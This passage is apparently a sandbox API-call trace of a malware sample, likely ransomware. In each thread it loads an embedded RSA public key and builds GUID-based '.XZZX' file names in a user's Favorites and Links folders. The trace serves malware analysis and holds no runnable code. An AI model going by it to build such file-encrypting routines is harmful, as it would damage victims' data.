PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.874] lstrcpyW (in: lpString1=0x2baf460, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0238.874] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.874] SetErrorMode (uMode=0x1) returned 0x1 [0238.874] lstrcpyW (in: lpString1=0x2baf860, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0238.874] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xafe62298, Data2=0xb7f0, Data3=0x478c, Data4=([0]=0xa3, [1]=0xc4, [2]=0xb8, [3]=0x2c, [4]=0x3f, [5]=0x21, [6]=0x3a, [7]=0x22))) returned 0x0 [0238.874] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\94764F5B3C2DC73EAED48D494045AB86.XZZX") returned 94 [0238.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0238.874] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\6A7B168033682740AFE6229836230B88.XZZX") returned 94 [0238.874] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 940 os_tid = 0x11b8 [0239.034] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.034] lstrcpyW (in: lpString1=0x2baf460, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0239.034] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.034] SetErrorMode (uMode=0x1) returned 0x1 [0239.034] lstrcpyW (in: lpString1=0x2baf860, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0239.034] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xac062eb1, Data2=0x32a0, Data3=0x43e2, Data4=([0]=0x80, [1]=0xef, [2]=0x73, [3]=0x84, [4]=0x9e, [5]=0xfe, [6]=0x2c, [7]=0xec))) returned 0x0 [0239.034] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned 94 [0239.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.034] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\B8FBC0A00D6C9140AC062EB110277588.XZZX") returned 94 [0239.034] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 941 os_tid = 0x11bc [0239.186] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.186] lstrcpyW (in: lpString1=0x2baf460, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0239.186] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.186] SetErrorMode (uMode=0x1) returned 0x1 [0239.186] lstrcpyW (in: lpString1=0x2baf860, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0239.186] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x3c4eae99, Data2=0x75c6, Data3=0x4d17, Data4=([0]=0x97, [1]=0x18, [2]=0xd9, [3]=0x28, [4]=0x61, [5]=0x82, [6]=0x2b, [7]=0xb0))) returned 0x0 [0239.186] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\A58916D017654CD0CF379F2B1B923118.XZZX") returned 94 [0239.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.186] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9AA6F756237722CA3C4EAE9926320712.XZZX") returned 94 [0239.186] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 942 os_tid = 0x11c0 [0239.342] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.342] lstrcpyW (in: lpString1=0x2baf460, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0239.342] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.342] SetErrorMode (uMode=0x1) returned 0x1 [0239.342] lstrcpyW (in: lpString1=0x2baf860, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0239.342] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x570cde3, Data2=0x9e71, Data3=0x4f25, Data4=([0]=0xad, [1]=0xbe, [2]=0xe3, [3]=0xfc, [4]=0x3d, [5]=0xf, [6]=0x2b, [7]=0xa6))) returned 0x0 [0239.342] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\D9B986602FBC15FEC37446303428FA46.XZZX") returned 94 [0239.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.342] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\05DCFB3330FBC5550570CDE333B6A99D.XZZX") returned 94 [0239.342] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 943 os_tid = 0x11c4 [0239.497] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.497] lstrcpyW (in: lpString1=0x2baf460, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0239.497] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.497] SetErrorMode (uMode=0x1) returned 0x1 [0239.497] lstrcpyW (in: lpString1=0x2baf860, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0239.497] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xe3f18ee4, Data2=0x84ff, Data3=0x4a58, Data4=([0]=0x82, [1]=0x3b, [2]=0x2b, [3]=0x94, [4]=0x55, [5]=0x40, [6]=0xa8, [7]=0xaf))) returned 0x0 [0239.497] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned 94 [0239.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.497] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9B4AE51C269F6DA8E3F18EE4295A51F0.XZZX") returned 94 [0239.497] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 944 os_tid = 0x11c8 [0239.656] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.656] lstrcpyW (in: lpString1=0x2baf460, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0239.656] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.656] SetErrorMode (uMode=0x1) returned 0x1 [0239.656] lstrcpyW (in: lpString1=0x2baf860, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0239.656] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x58427eb, Data2=0xa27a, Data3=0x4612, Data4=([0]=0xa8, [1]=0x63, [2]=0xf8, [3]=0x41, [4]=0xe7, [5]=0x50, [6]=0x26, [7]=0x28))) returned 0x0 [0239.656] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\02D36BF7229FBF1A2D198367271CA362.XZZX") returned 77 [0239.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.656] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\423DBBFE2C78C894058427EB2F33ACDC.XZZX") returned 77 [0239.656] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 945 os_tid = 0x11cc [0239.809] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.809] lstrcpyW (in: lpString1=0x2baf460, lpString2="323285543E8B2CB8C06CF7B742AC1100.XZZX" | out: lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX") returned="323285543E8B2CB8C06CF7B742AC1100.XZZX" [0239.809] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.809] SetErrorMode (uMode=0x1) returned 0x1 [0239.809] lstrcpyW (in: lpString1=0x2baf860, lpString2="323285543E8B2CB8C06CF7B742AC1100.XZZX" | out: lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX") returned="323285543E8B2CB8C06CF7B742AC1100.XZZX" [0239.809] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x17f6ace5, Data2=0xc1a4, Data3=0x4f60, Data4=([0]=0xa5, [1]=0x34, [2]=0x92, [3]=0xe, [4]=0x31, [5]=0x2d, [6]=0x13, [7]=0xf2))) returned 0x0 [0239.809] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\323285543E8B2CB8C06CF7B742AC1100.XZZX") returned 77 [0239.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.809] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\525F67B43C0A398017F6ACE53EC51DC8.XZZX") returned 77 [0239.809] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 946 os_tid = 0x11d0 [0239.966] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.966] lstrcpyW (in: lpString1=0x2baf460, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0239.966] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0239.966] SetErrorMode (uMode=0x1) returned 0x1 [0239.966] lstrcpyW (in: lpString1=0x2baf860, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0239.966] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x3079683c, Data2=0x69e5, Data3=0x4dad, Data4=([0]=0x88, [1]=0x33, [2]=0xa4, [3]=0x8, [4]=0xc8, [5]=0x30, [6]=0xb1, [7]=0xe1))) returned 0x0 [0239.966] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\61C67744188385C0EADA50E91CF06A08.XZZX") returned 77 [0239.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0239.966] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\285AD9AC202170C13079683C22DC5509.XZZX") returned 77 [0239.966] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 947 os_tid = 0x11d4 [0240.121] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW 